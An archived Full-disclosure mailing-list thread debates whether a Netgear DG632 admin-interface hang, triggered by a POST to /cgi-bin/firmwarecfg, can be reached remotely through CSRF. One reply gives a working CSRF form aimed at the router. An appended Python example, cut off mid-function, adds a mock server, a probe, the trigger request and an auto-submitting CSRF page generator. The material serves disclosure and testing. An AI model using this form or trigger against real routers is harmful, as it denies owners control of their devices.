Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-17 Thread Adrian P
3APA3A,

I was actually *agreeing* with you! lols. I think something got lost
in translation! Sorry if I confused anyone really.

Good luck.

2009/6/17 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru>:
> Adrian,
>
>  If you can execute JavaScript, what is the reason to wait for the user to
>  click the link? The message I replied to stated there is no need to force
>  the user to visit a Web page and that clicking the obfuscated link _sent_ to
>  the admin is enough. I replied that in this case only a GET request is possible.
>  Read the thread carefully before making conclusions.
>
>
> --Wednesday, June 17, 2009, 2:58:15 AM, you wrote to 
> jeremi.gos...@motricity.com:
>
> AP> you would be surprised how many people out there (mistakenly) still
> AP> think that only GET requests are CSRFable!
>
> AP> 2009/6/16 Jeremi Gosney :
>>> Vladimir: "Where there is an open mind, there will always be a frontier." - 
>>> Charles Kettering
>>>
>>> <form method='POST' action='http://192.168.1.1/cgi-bin/firmwarecfg' name='DoS'>
>>> </form>
>>> <a href='#' onclick='document.DoS.submit();'>Google</a>
>>>
>>>
>>>
>>> -Original Message-
>>> From: full-disclosure-boun...@lists.grok.org.uk
>>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>>> Vladimir Dubrovin
>>> Sent: Tuesday, June 16, 2009 9:43 AM
>>> To: sr.
>>> Cc: full-disclosure@lists.grok.org.uk
>>> Subject: Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
>>>
>>> Dear sr.,
>>>
>>>  clicking on the link cannot produce a POST request, only a GET, unless
>>>  there are some special conditions, like a cross-site scripting
>>>  vulnerability in the router.
>>>
>>> --16.06.2009 19:16, you wrote [Full-disclosure] Netgear DG632
>>> Router Remote DoS Vulnerability to full-disclosure@lists.grok.org.uk;
>>>
>>> s> it could still be carried out remotely by obfuscating a link sent to the
>>> s> "admin" of the device. this would obviously rely on the admin clicking on
>>> s> the link, and is more of a phishing / social engineering style attack. 
>>> this
>>> s> would also rely on the router being set up with all of the default
>>> internal
>>> s> LAN IPs.
>>>
>>> s> sr.
>>>
>>>
>>> s> 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru>
>>>
>>>>> Dear Tom Neaves,
>>>>>
>>>>>  It  still can be exploited from Internet even if "remote management" is
>>>>> only  accessible  from local network. If you can trick user to visit Web
>>>>> page,  you  can  place  a  form on this page which targets to router and
>>>>> request to router is issued from victim's browser.
>>>>>
>>>>>
>>>>> --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com:
>>>>>
>>>>> TN> Hi.
>>>>>
>>>>> TN> I see where you're going but I think you're missing the point a 
>>>>> little.
>>>>>  By
>>>>> TN> *default* the web interface is enabled on the LAN and accessible by
>>>>> anyone
>>>>> TN> on that LAN and the "remote management" interface (for the Internet) 
>>>>> is
>>>>> TN> turned off.  If the "remote management" interface was enabled, 
>>>>> stopping
>>>>> ICMP
>>>>> TN> echo responses would not resolve this issue at all, turning the
>>>>> interface
>>>>> TN> off would do though (or restricting by IP, ...ack).  The "remote
>>>>> management"
>>>>> TN> (love those quotes...) interface speaks over HTTP hence TCP so no
>>>>> amount of
>>>>> TN> dropping ICMP goodness will help with this.  Anyhow, I am happy to
>>>>> discuss
> >>>>> TN> this off list with you if it's still not clear to save spamming
>>>>> everyone's
>>>>> TN> inboxes. :o)
>>>>>
>>>>> TN> Tom
>>>>>
>>>>> TN> - Original Message -
>>>>> TN> From: Alaa El yazghi
>>>>> TN> To: Tom Neaves
>>>>> TN> Cc: bugt...@securityfocus.com ;
>>>>> full-disclosure@lists.gr

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Vladimir '3APA3A' Dubrovin
Adrian,

  If you can execute JavaScript, what is the reason to wait for the user to
  click the link? The message I replied to stated there is no need to force
  the user to visit a Web page and that clicking the obfuscated link _sent_ to
  the admin is enough. I replied that in this case only a GET request is possible.
  Read the thread carefully before making conclusions.
  
  
--Wednesday, June 17, 2009, 2:58:15 AM, you wrote to 
jeremi.gos...@motricity.com:

AP> you would be surprised how many people out there (mistakenly) still
AP> think that only GET requests are CSRFable!

AP> 2009/6/16 Jeremi Gosney :
>> Vladimir: "Where there is an open mind, there will always be a frontier." - 
>> Charles Kettering
>>
>> <form method='POST' action='http://192.168.1.1/cgi-bin/firmwarecfg' name='DoS'>
>> </form>
>> <a href='#' onclick='document.DoS.submit();'>Google</a>
>>
>>
>>
>> -Original Message-
>> From: full-disclosure-boun...@lists.grok.org.uk
>> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of
>> Vladimir Dubrovin
>> Sent: Tuesday, June 16, 2009 9:43 AM
>> To: sr.
>> Cc: full-disclosure@lists.grok.org.uk
>> Subject: Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
>>
>> Dear sr.,
>>
>>  clicking on the link cannot produce a POST request, only a GET, unless
>>  there are some special conditions, like a cross-site scripting
>>  vulnerability in the router.
>>
>> --16.06.2009 19:16, you wrote [Full-disclosure] Netgear DG632
>> Router Remote DoS Vulnerability to full-disclosure@lists.grok.org.uk;
>>
>> s> it could still be carried out remotely by obfuscating a link sent to the
>> s> "admin" of the device. this would obviously rely on the admin clicking on
>> s> the link, and is more of a phishing / social engineering style attack. 
>> this
>> s> would also rely on the router being set up with all of the default internal
>> s> LAN IPs.
>>
>> s> sr.
>>
>>
>> s> 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru>
>>
>>>> Dear Tom Neaves,
>>>>
>>>>  It  still can be exploited from Internet even if "remote management" is
>>>> only  accessible  from local network. If you can trick user to visit Web
>>>> page,  you  can  place  a  form on this page which targets to router and
>>>> request to router is issued from victim's browser.
>>>>
>>>>
>>>> --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com:
>>>>
>>>> TN> Hi.
>>>>
>>>> TN> I see where you're going but I think you're missing the point a little.
>>>>  By
>>>> TN> *default* the web interface is enabled on the LAN and accessible by
>>>> anyone
>>>> TN> on that LAN and the "remote management" interface (for the Internet) is
>>>> TN> turned off.  If the "remote management" interface was enabled, stopping
>>>> ICMP
>>>> TN> echo responses would not resolve this issue at all, turning the
>>>> interface
>>>> TN> off would do though (or restricting by IP, ...ack).  The "remote
>>>> management"
>>>> TN> (love those quotes...) interface speaks over HTTP hence TCP so no
>>>> amount of
>>>> TN> dropping ICMP goodness will help with this.  Anyhow, I am happy to
>>>> discuss
>>>> TN> this off list with you if it's still not clear to save spamming
>>>> everyone's
>>>> TN> inboxes. :o)
>>>>
>>>> TN> Tom
>>>>
>>>> TN> - Original Message -
>>>> TN> From: Alaa El yazghi
>>>> TN> To: Tom Neaves
>>>> TN> Cc: bugt...@securityfocus.com ;
>>>> full-disclosure@lists.grok.org.uk
>>>> TN> Sent: Monday, June 15, 2009 11:03 PM
>>>> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability
>>>>
>>>>
>>>> TN> I know and I understand. What I meant is that we cannot access the
>>>> TN> web interface of a Netgear router remotely if we cannot locally.
>>>> TN> As for the DoS, it is simple to solve  such attack from outside. We
>>>> just
>>>> TN> disable receiving pings (There is actually an option in even the lowest
>>>> TN> series) and thus, we would be able to have

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Adrian P
you would be surprised how many people out there (mistakenly) still
think that only GET requests are CSRFable!

2009/6/16 Jeremi Gosney :
> Vladimir: "Where there is an open mind, there will always be a frontier." - 
> Charles Kettering
>
> <form method='POST' action='http://192.168.1.1/cgi-bin/firmwarecfg' name='DoS'>
> </form>
> <a href='#' onclick='document.DoS.submit();'>Google</a>
>
>
>
> -Original Message-
> From: full-disclosure-boun...@lists.grok.org.uk 
> [mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Vladimir 
> Dubrovin
> Sent: Tuesday, June 16, 2009 9:43 AM
> To: sr.
> Cc: full-disclosure@lists.grok.org.uk
> Subject: Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability
>
> Dear sr.,
>
>  clicking on the link cannot produce a POST request, only a GET, unless
>  there are some special conditions, like a cross-site scripting
>  vulnerability in the router.
>
> --16.06.2009 19:16, you wrote [Full-disclosure] Netgear DG632 Router Remote 
> DoS Vulnerability to full-disclosure@lists.grok.org.uk;
>
> s> it could still be carried out remotely by obfuscating a link sent to the
> s> "admin" of the device. this would obviously rely on the admin clicking on
> s> the link, and is more of a phishing / social engineering style attack. this
> s> would also rely on the router being set up with all of the default internal
> s> LAN IPs.
>
> s> sr.
>
>
> s> 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru>
>
>>> Dear Tom Neaves,
>>>
>>>  It  still can be exploited from Internet even if "remote management" is
>>> only  accessible  from local network. If you can trick user to visit Web
>>> page,  you  can  place  a  form on this page which targets to router and
>>> request to router is issued from victim's browser.
>>>
>>>
>>> --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com:
>>>
>>> TN> Hi.
>>>
>>> TN> I see where you're going but I think you're missing the point a little.
>>>  By
>>> TN> *default* the web interface is enabled on the LAN and accessible by
>>> anyone
>>> TN> on that LAN and the "remote management" interface (for the Internet) is
>>> TN> turned off.  If the "remote management" interface was enabled, stopping
>>> ICMP
>>> TN> echo responses would not resolve this issue at all, turning the
>>> interface
>>> TN> off would do though (or restricting by IP, ...ack).  The "remote
>>> management"
>>> TN> (love those quotes...) interface speaks over HTTP hence TCP so no
>>> amount of
>>> TN> dropping ICMP goodness will help with this.  Anyhow, I am happy to
>>> discuss
>>> TN> this off list with you if it's still not clear to save spamming
>>> everyone's
>>> TN> inboxes. :o)
>>>
>>> TN> Tom
>>>
>>> TN> - Original Message -
>>> TN> From: Alaa El yazghi
>>> TN> To: Tom Neaves
>>> TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
>>> TN> Sent: Monday, June 15, 2009 11:03 PM
>>> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability
>>>
>>>
>>> TN> I know and I understand. What I meant is that we cannot access the
>>> TN> web interface of a Netgear router remotely if we cannot locally.
>>> TN> As for the DoS, it is simple to solve  such attack from outside. We
>>> just
>>> TN> disable receiving pings (There is actually an option in even the lowest
>>> TN> series) and thus, we would be able to have a remote management without
>>> ICMP
>>> TN> requests.
>>>
>>>
>>>
>>> TN> 2009/6/15 Tom Neaves 
>>>
>>> TN> Hi.
>>>
>>> TN> I'm not quite sure of your question...
>>>
>>> TN> The DoS can be carried out remotely, however one mitigating factor
>>> (which
>>> TN> makes it a low risk as opposed to sirens and alarms...) is that it's
>>> turned
>>> TN> off by default - you have to explicitly enable it under "Remote
>>> Management"
>>> TN> on the device if you want to access it/carry out the DoS over the
>>> Internet.
>>> TN> However, it is worth noting that anyone on your LAN can *remotely*
>>> carry out
>>> TN> this attack regardless of this management feature being on/off.
>>>
>>>

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Jeremi Gosney
Vladimir: "Where there is an open mind, there will always be a frontier." - 
Charles Kettering

<form method='POST' action='http://192.168.1.1/cgi-bin/firmwarecfg' name='DoS'>
</form>
<a href='#' onclick='document.DoS.submit();'>Google</a>



-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Vladimir 
Dubrovin
Sent: Tuesday, June 16, 2009 9:43 AM
To: sr.
Cc: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

Dear sr.,

  clicking on the link cannot produce a POST request, only a GET, unless
  there are some special conditions, like a cross-site scripting
  vulnerability in the router.

--16.06.2009 19:16, you wrote [Full-disclosure] Netgear DG632 Router Remote DoS 
Vulnerability to full-disclosure@lists.grok.org.uk;

s> it could still be carried out remotely by obfuscating a link sent to the
s> "admin" of the device. this would obviously rely on the admin clicking on
s> the link, and is more of a phishing / social engineering style attack. this
s> would also rely on the router being set up with all of the default internal
s> LAN IPs.

s> sr.


s> 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru>

>> Dear Tom Neaves,
>>
>>  It  still can be exploited from Internet even if "remote management" is
>> only  accessible  from local network. If you can trick user to visit Web
>> page,  you  can  place  a  form on this page which targets to router and
>> request to router is issued from victim's browser.
>>
>>
>> --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com:
>>
>> TN> Hi.
>>
>> TN> I see where you're going but I think you're missing the point a little.
>>  By
>> TN> *default* the web interface is enabled on the LAN and accessible by
>> anyone
>> TN> on that LAN and the "remote management" interface (for the Internet) is
>> TN> turned off.  If the "remote management" interface was enabled, stopping
>> ICMP
>> TN> echo responses would not resolve this issue at all, turning the
>> interface
>> TN> off would do though (or restricting by IP, ...ack).  The "remote
>> management"
>> TN> (love those quotes...) interface speaks over HTTP hence TCP so no
>> amount of
>> TN> dropping ICMP goodness will help with this.  Anyhow, I am happy to
>> discuss
>> TN> this off list with you if it's still not clear to save spamming
>> everyone's
>> TN> inboxes. :o)
>>
>> TN> Tom
>>
>> TN> - Original Message -
>> TN> From: Alaa El yazghi
>> TN> To: Tom Neaves
>> TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
>> TN> Sent: Monday, June 15, 2009 11:03 PM
>> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability
>>
>>
>> TN> I know and I understand. What I meant is that we cannot access the
>> TN> web interface of a Netgear router remotely if we cannot locally.
>> TN> As for the DoS, it is simple to solve  such attack from outside. We
>> just
>> TN> disable receiving pings (There is actually an option in even the lowest
>> TN> series) and thus, we would be able to have a remote management without
>> ICMP
>> TN> requests.
>>
>>
>>
>> TN> 2009/6/15 Tom Neaves 
>>
>> TN> Hi.
>>
>> TN> I'm not quite sure of your question...
>>
>> TN> The DoS can be carried out remotely, however one mitigating factor
>> (which
>> TN> makes it a low risk as opposed to sirens and alarms...) is that it's
>> turned
>> TN> off by default - you have to explicitly enable it under "Remote
>> Management"
>> TN> on the device if you want to access it/carry out the DoS over the
>> Internet.
>> TN> However, it is worth noting that anyone on your LAN can *remotely*
>> carry out
>> TN> this attack regardless of this management feature being on/off.
>>
>> TN> I hope this clarifies it for you.
>>
>> TN> Tom
>> TN> - Original Message -
>> TN> From: Alaa El yazghi
>> TN> To: Tom Neaves
>> TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
>> TN> Sent: Monday, June 15, 2009 10:45 PM
>> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability
>>
>>
>> TN> How can it be carried out remotely if it bugs locally?
>>
>>
>> TN> 2009/6/15 Tom Neaves 
>>
>> TN> Product Name: Netgear DG632 Router
>> TN> Vendor: http://www.net

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Vladimir Dubrovin
Dear sr.,

  clicking on the link cannot produce a POST request, only a GET, unless
  there are some special conditions, like a cross-site scripting
  vulnerability in the router.

--16.06.2009 19:16, you wrote [Full-disclosure] Netgear DG632 Router Remote DoS 
Vulnerability to full-disclosure@lists.grok.org.uk;

s> it could still be carried out remotely by obfuscating a link sent to the
s> "admin" of the device. this would obviously rely on the admin clicking on
s> the link, and is more of a phishing / social engineering style attack. this
s> would also rely on the router being set up with all of the default internal
s> LAN IPs.

s> sr.


s> 2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru>

>> Dear Tom Neaves,
>>
>>  It  still can be exploited from Internet even if "remote management" is
>> only  accessible  from local network. If you can trick user to visit Web
>> page,  you  can  place  a  form on this page which targets to router and
>> request to router is issued from victim's browser.
>>
>>
>> --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com:
>>
>> TN> Hi.
>>
>> TN> I see where you're going but I think you're missing the point a little.
>>  By
>> TN> *default* the web interface is enabled on the LAN and accessible by
>> anyone
>> TN> on that LAN and the "remote management" interface (for the Internet) is
>> TN> turned off.  If the "remote management" interface was enabled, stopping
>> ICMP
>> TN> echo responses would not resolve this issue at all, turning the
>> interface
>> TN> off would do though (or restricting by IP, ...ack).  The "remote
>> management"
>> TN> (love those quotes...) interface speaks over HTTP hence TCP so no
>> amount of
>> TN> dropping ICMP goodness will help with this.  Anyhow, I am happy to
>> discuss
>> TN> this off list with you if it's still not clear to save spamming
>> everyone's
>> TN> inboxes. :o)
>>
>> TN> Tom
>>
>> TN> - Original Message -
>> TN> From: Alaa El yazghi
>> TN> To: Tom Neaves
>> TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
>> TN> Sent: Monday, June 15, 2009 11:03 PM
>> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability
>>
>>
>> TN> I know and I understand. What I meant is that we cannot access the
>> TN> web interface of a Netgear router remotely if we cannot locally.
>> TN> As for the DoS, it is simple to solve  such attack from outside. We
>> just
>> TN> disable receiving pings (There is actually an option in even the lowest
>> TN> series) and thus, we would be able to have a remote management without
>> ICMP
>> TN> requests.
>>
>>
>>
>> TN> 2009/6/15 Tom Neaves 
>>
>> TN> Hi.
>>
>> TN> I'm not quite sure of your question...
>>
>> TN> The DoS can be carried out remotely, however one mitigating factor
>> (which
>> TN> makes it a low risk as opposed to sirens and alarms...) is that it's
>> turned
>> TN> off by default - you have to explicitly enable it under "Remote
>> Management"
>> TN> on the device if you want to access it/carry out the DoS over the
>> Internet.
>> TN> However, it is worth noting that anyone on your LAN can *remotely*
>> carry out
>> TN> this attack regardless of this management feature being on/off.
>>
>> TN> I hope this clarifies it for you.
>>
>> TN> Tom
>> TN> - Original Message -
>> TN> From: Alaa El yazghi
>> TN> To: Tom Neaves
>> TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
>> TN> Sent: Monday, June 15, 2009 10:45 PM
>> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability
>>
>>
>> TN> How can it be carried out remotely if it bugs locally?
>>
>>
>> TN> 2009/6/15 Tom Neaves 
>>
>> TN> Product Name: Netgear DG632 Router
>> TN> Vendor: http://www.netgear.com
>> TN> Date: 15 June, 2009
>> TN> Author: t...@tomneaves.co.uk 
>> TN> Original URL:
>> TN> http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
>> TN> Discovered: 18 November, 2006
>> TN> Disclosed: 15 June, 2009
>>
>> TN> I. DESCRIPTION
>>
>> TN> The Netgear DG632 router has a web interface which runs on port 80.
>>  This
>> TN> allow

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread Jeremi Gosney
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

and as previously stated, if you have 'remote management' enabled then you are 
truly vulnerable to outside threats. csrf works as well. but an attack carried 
out on the LAN would still be considered a remote attack; although, you'd 
likely be within arm's reach of the attacker, so you'd know who to punch in the 
nose when the web server stopped responding. both vectors are considered 
'remote' since the attacker is not legitimately authenticated to the system.


--

From: full-disclosure-boun...@lists.grok.org.uk 
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of sr.
Sent: Tuesday, June 16, 2009 8:17 AM
To: full-disclosure@lists.grok.org.uk
Subject: Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

it could still be carried out remotely by obfuscating a link sent to the 
"admin" of the device. this would obviously rely on the admin clicking on the 
link, and is more of a phishing / social engineering style attack. this would 
also rely on the router being set up with all of the default internal LAN IPs.

sr.

2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru> Dear Tom Neaves,

 It  still can be exploited from Internet even if "remote management" is only  
accessible  from local network. If you can trick user to visit Web page,  you  
can  place  a  form on this page which targets to router and request to router 
is issued from victim's browser.


--Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com:

TN> Hi.

TN> I see where you're going but I think you're missing the point a 
TN> little.  By
TN> *default* the web interface is enabled on the LAN and accessible by 
TN> anyone on that LAN and the "remote management" interface (for the
TN> Internet) is turned off.  If the "remote management" interface was 
TN> enabled, stopping ICMP echo responses would not resolve this issue 
TN> at all, turning the interface off would do though (or restricting by IP, 
...ack).  The "remote management"
TN> (love those quotes...) interface speaks over HTTP hence TCP so no 
TN> amount of dropping ICMP goodness will help with this.  Anyhow, I am 
TN> happy to discuss this off list with you if it's still not clear to 
TN> save spamming everyone's inboxes. :o)

TN> Tom

TN> - Original Message -
TN> From: Alaa El yazghi
TN> To: Tom Neaves
TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
TN> Sent: Monday, June 15, 2009 11:03 PM
TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability


TN> I know and I understand. What I meant is that we cannot access the 
TN> web interface of a Netgear router remotely if we cannot locally.
TN> As for the DoS, it is simple to solve  such attack from outside. We 
TN> just disable receiving pings (There is actually an option in even 
TN> the lowest
TN> series) and thus, we would be able to have a remote management 
TN> without ICMP requests.



TN> 2009/6/15 Tom Neaves 

TN> Hi.

TN> I'm not quite sure of your question...

TN> The DoS can be carried out remotely, however one mitigating factor 
TN> (which makes it a low risk as opposed to sirens and alarms...) is 
TN> that it's turned off by default - you have to explicitly enable it under 
"Remote Management"
TN> on the device if you want to access it/carry out the DoS over the Internet.
TN> However, it is worth noting that anyone on your LAN can *remotely* 
TN> carry out this attack regardless of this management feature being on/off.

TN> I hope this clarifies it for you.

TN> Tom
TN> - Original Message -
TN> From: Alaa El yazghi
TN> To: Tom Neaves
TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
TN> Sent: Monday, June 15, 2009 10:45 PM
TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability


TN> How can it be carried out remotely if it bugs locally?


TN> 2009/6/15 Tom Neaves 

TN> Product Name: Netgear DG632 Router
TN> Vendor: http://www.netgear.com
TN> Date: 15 June, 2009
TN> Author: t...@tomneaves.co.uk  Original URL:
TN> http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
TN> Discovered: 18 November, 2006
TN> Disclosed: 15 June, 2009

TN> I. DESCRIPTION

TN> The Netgear DG632 router has a web interface which runs on port 80. 
TN> This allows an admin to login and administer the device's settings.
TN> However, a Denial of Service (DoS) vulnerability exists that causes 
TN> the web interface to crash and stop responding to further requests.

TN> II. DETAILS

TN> Within the "/cgi-bin/" directory of the administrative web interface 
TN> exists a file called "firmwarecfg".  This file is 

Re: [Full-disclosure] Netgear DG632 Router Remote DoS Vulnerability

2009-06-16 Thread sr.
it could still be carried out remotely by obfuscating a link sent to the
"admin" of the device. this would obviously rely on the admin clicking on
the link, and is more of a phishing / social engineering style attack. this
would also rely on the router being set up with all of the default internal
LAN IPs.

sr.


2009/6/16 Vladimir '3APA3A' Dubrovin <3ap...@security.nnov.ru>

> Dear Tom Neaves,
>
>  It  still can be exploited from Internet even if "remote management" is
> only  accessible  from local network. If you can trick user to visit Web
> page,  you  can  place  a  form on this page which targets to router and
> request to router is issued from victim's browser.
>
>
> --Tuesday, June 16, 2009, 2:11:27 AM, you wrote to m.elyaz...@gmail.com:
>
> TN> Hi.
>
> TN> I see where you're going but I think you're missing the point a little.
>  By
> TN> *default* the web interface is enabled on the LAN and accessible by
> anyone
> TN> on that LAN and the "remote management" interface (for the Internet) is
> TN> turned off.  If the "remote management" interface was enabled, stopping
> ICMP
> TN> echo responses would not resolve this issue at all, turning the
> interface
> TN> off would do though (or restricting by IP, ...ack).  The "remote
> management"
> TN> (love those quotes...) interface speaks over HTTP hence TCP so no
> amount of
> TN> dropping ICMP goodness will help with this.  Anyhow, I am happy to
> discuss
> TN> this off list with you if it's still not clear to save spamming
> everyone's
> TN> inboxes. :o)
>
> TN> Tom
>
> TN> - Original Message -
> TN> From: Alaa El yazghi
> TN> To: Tom Neaves
> TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
> TN> Sent: Monday, June 15, 2009 11:03 PM
> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability
>
>
> TN> I know and I understand. What I meant is that we cannot access the
> TN> web interface of a Netgear router remotely if we cannot locally.
> TN> As for the DoS, it is simple to solve  such attack from outside. We
> just
> TN> disable receiving pings (There is actually an option in even the lowest
> TN> series) and thus, we would be able to have a remote management without
> ICMP
> TN> requests.
>
>
>
> TN> 2009/6/15 Tom Neaves 
>
> TN> Hi.
>
> TN> I'm not quite sure of your question...
>
> TN> The DoS can be carried out remotely, however one mitigating factor
> (which
> TN> makes it a low risk as opposed to sirens and alarms...) is that it's
> turned
> TN> off by default - you have to explicitly enable it under "Remote
> Management"
> TN> on the device if you want to access it/carry out the DoS over the
> Internet.
> TN> However, it is worth noting that anyone on your LAN can *remotely*
> carry out
> TN> this attack regardless of this management feature being on/off.
>
> TN> I hope this clarifies it for you.
>
> TN> Tom
> TN> - Original Message -
> TN> From: Alaa El yazghi
> TN> To: Tom Neaves
> TN> Cc: bugt...@securityfocus.com ; full-disclosure@lists.grok.org.uk
> TN> Sent: Monday, June 15, 2009 10:45 PM
> TN> Subject: Re: Netgear DG632 Router Remote DoS Vulnerability
>
>
> TN> How can it be carried out remotely if it bugs locally?
>
>
> TN> 2009/6/15 Tom Neaves 
>
> TN> Product Name: Netgear DG632 Router
> TN> Vendor: http://www.netgear.com
> TN> Date: 15 June, 2009
> TN> Author: t...@tomneaves.co.uk 
> TN> Original URL:
> TN> http://www.tomneaves.co.uk/Netgear_DG632_Remote_DoS.txt
> TN> Discovered: 18 November, 2006
> TN> Disclosed: 15 June, 2009
>
> TN> I. DESCRIPTION
>
> TN> The Netgear DG632 router has a web interface which runs on port 80.
>  This
> TN> allows an admin to login and administer the device's settings.
>  However,
> TN> a Denial of Service (DoS) vulnerability exists that causes the web
> interface
> TN> to crash and stop responding to further requests.
>
> TN> II. DETAILS
>
> TN> Within the "/cgi-bin/" directory of the administrative web interface
> exists
> TN> a
> TN> file called "firmwarecfg".  This file is used for firmware upgrades.  A
> HTTP
> TN> POST
> TN> request for this file causes the web server to hang.  The web server
> will
> TN> stop
> TN> responding to requests and the administrative interface will become
> TN> inaccessible
> TN> until the router is physically restarted.
>
> TN> While the router will still continue to function at the network level,
> i.e.
> TN> it will
> TN> still respond to ICMP echo requests and issue leases via DHCP, an
> TN> administrator will
> TN> no longer be able to interact with the administrative web interface.
>
> TN> This attack can be carried out internally within the network, or over
> the
> TN> Internet
> TN> if the administrator has enabled the "Remote Management" feature on the
> TN> router.
>
> TN> Affected Versions: Firmware V3.4.0_ap (others unknown)
>
> TN> III. VENDOR RESPONSE
>
> TN> 12 June, 2009 - Contacted vendor.
> TN> 15 June, 2009 - Vendor responded.  Stated the DG632 is an end of life
> TN> product and is
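An added example, not part of the advisory or of any message in this thread, to make the failure mode in section II concrete and to show the check an operator would actually run. MockDG632 is a constructed stand-in for the router's web server and only imitates what the advisory describes (one POST to /cgi-bin/firmwarecfg and the interface stops answering); HANG_SECONDS is an assumption that bounds the hang so the demo can finish, where the real device stays down until a power cycle. admin_alive() is the availability probe to point at a real device's LAN address, post_firmwarecfg() is the single request the advisory names, and silent_post_page() is the form variant 3APA3A alludes to, which submits on page load rather than on a click. 127.0.0.1 and the ephemeral port are only for the offline run.

```python
"""Added example: offline model of the DG632 admin-interface hang plus the
availability probe an operator would run.  MockDG632 is constructed for this
demo and only imitates what the advisory describes; it is not Netgear code."""
import html
import http.client
import threading
import time
from http.server import BaseHTTPRequestHandler, ThreadingHTTPServer

FIRMWARE_CGI = "/cgi-bin/firmwarecfg"  # path named in the advisory
HANG_SECONDS = 2.0  # assumption for the mock; the real device hangs until reboot


class MockDG632(BaseHTTPRequestHandler):
    """Stand-in for the router's web server: after one POST to firmwarecfg
    every request stalls (no bytes sent back) until hung_until has passed."""
    hung_until = 0.0  # class attribute, shared by all handler threads

    def _stall_if_hung(self):
        delay = MockDG632.hung_until - time.monotonic()
        if delay > 0:
            time.sleep(delay)

    def do_GET(self):
        self._stall_if_hung()
        body = b"DG632 admin interface"
        self.send_response(200)
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def do_POST(self):
        if self.path == FIRMWARE_CGI:  # the trigger from section II
            MockDG632.hung_until = time.monotonic() + HANG_SECONDS
        self._stall_if_hung()
        self.send_response(200)
        self.send_header("Content-Length", "0")
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the run quiet


class QuietServer(ThreadingHTTPServer):
    def handle_error(self, request, client_address):
        pass  # stalled handlers later write to sockets the client gave up on


def admin_alive(host, port, timeout=0.5):
    """True if the admin interface answers GET / within `timeout` seconds.
    This is the check to run against a real device (host/port are yours)."""
    try:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.request("GET", "/")
        status = conn.getresponse().status
        conn.close()
        return status < 500
    except OSError:  # socket.timeout is an OSError subclass
        return False


def post_firmwarecfg(host, port, timeout=0.5):
    """The single request the advisory names. True only if the server answered;
    on the affected firmware the request itself never gets a reply."""
    try:
        conn = http.client.HTTPConnection(host, port, timeout=timeout)
        conn.request("POST", FIRMWARE_CGI, body=b"")
        conn.getresponse()
        conn.close()
        return True
    except OSError:
        return False


def silent_post_page(action):
    """Cross-site page that POSTs on load: no click needed.  A plain <a href>
    click can only produce a GET; only a form submission yields the POST."""
    return ('<html><body onload="document.forms.DoS.submit()">'
            f'<form name="DoS" method="POST" action="{html.escape(action)}">'
            '</form></body></html>')


def run_demo():
    """Start the mock on an ephemeral port, trigger the hang, probe around it."""
    MockDG632.hung_until = 0.0
    server = QuietServer(("127.0.0.1", 0), MockDG632)
    host, port = server.server_address
    threading.Thread(target=server.serve_forever, daemon=True).start()
    try:
        result = {"before": admin_alive(host, port)}
        result["post_answered"] = post_firmwarecfg(host, port)
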